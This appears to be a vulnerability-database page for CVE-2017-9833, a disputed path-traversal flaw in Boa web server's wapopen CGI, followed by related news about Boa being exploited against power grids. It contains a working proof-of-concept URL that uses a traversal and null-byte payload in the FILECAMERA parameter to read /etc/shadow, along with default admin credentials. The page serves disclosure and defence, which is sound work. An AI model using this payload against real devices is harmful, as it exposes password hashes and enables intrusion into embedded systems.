Headline
CVE-2017-9833
** DISPUTED ** /cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of “…/…” using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable.
BOA Web Server 0.94.14 - Access to arbitrary files as privileges Title: Vulnerability in BOA Webserver 0.94.14 Date: 20-06-2017 Status: Vendor contacted, patch available Scope: Arbitrary file access Platforms: Unix Author: Miguel Mendez Z Vendor Homepage: http://www.boa.org Version: Boa Webserver 0.94.14rc21 Vulnerability description ------------------------- -We can read any file located on the server The server allows the injection of “…/…” using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials Vulnerable variable: FILECAMERA=…/…/etc/shadow%00 Exploit link: /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=…/…/etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 Poc: http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=…/…/etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 Screenshot: Step1 - https://i.imgur.com/V4ov1xa_d.jpg?maxwidth=640&shape=thumb&fidelity=high Step2 - https://i.imgur.com/7BJLNz4_d.webp?maxwidth=640&shape=thumb&fidelity Step3 - https://i.imgur.com/fi41vmu_d.jpg?maxwidth=640&shape=thumb&fidelity=high
Related news
By Habiba Rashid Boa was discontinued in 2005 but remained popular and is now becoming a crisis because of the complex nature of how it was built into the IoT device supply chain. This is a post from HackRead.com Read the original post: Retired Software Exploited To Target Power Grids, Microsoft
Chinese threat actors have already used the vulnerable and pervasive Boa server to infiltrate the electrical grid in India, in spate of malicious incidents.
Microsoft on Tuesday disclosed the intrusion activity aimed at Indian power grid entities earlier this year likely involved the exploitation of security flaws in a now-discontinued web server called Boa. The tech behemoth's cybersecurity division said the vulnerable component poses a "supply chain risk that may affect millions of organizations and devices." The findings build on a prior report
The Bosch Ethernet switch PRA-ES8P2S with software version 1.01.05 runs its web server with root privilege. In combination with CVE-2022-23534 this could give an attacker root access to the switch.